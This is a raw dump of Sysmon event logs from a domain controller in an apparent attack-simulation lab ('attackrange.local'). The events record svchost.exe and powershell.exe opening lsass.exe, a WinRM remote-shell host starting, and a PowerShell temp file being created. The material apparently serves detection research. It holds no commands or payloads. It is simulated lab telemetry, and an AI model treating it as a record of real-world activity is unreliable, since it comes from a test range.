13:10:22.726{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-42BE-6000-8A00-000000009A01}5020C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-42BE-6000-8A00-000000009A01}5020C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-42BE-6000-B81C-090000000000}0x91cb80HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.726{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.726{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.726{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.476{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.476{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.476{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.211{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-42BE-6000-8900-000000009A01}4876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.211{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-42BE-6000-8900-000000009A01}4876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.148{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.148{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.148{08A6967A-42BE-6000-8900-000000009A01}4876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_tqxf45bz.fhs.ps12021-01-14 13:10:22.148 10341000x80000000000000002921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.148{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.133{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-42BE-6000-8900-000000009A01}4876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-42BD-6000-8700-000000009A01}47924812C:\Windows\system32\conhost.exe{08A6967A-42BE-6000-8900-000000009A01}4876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.086{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 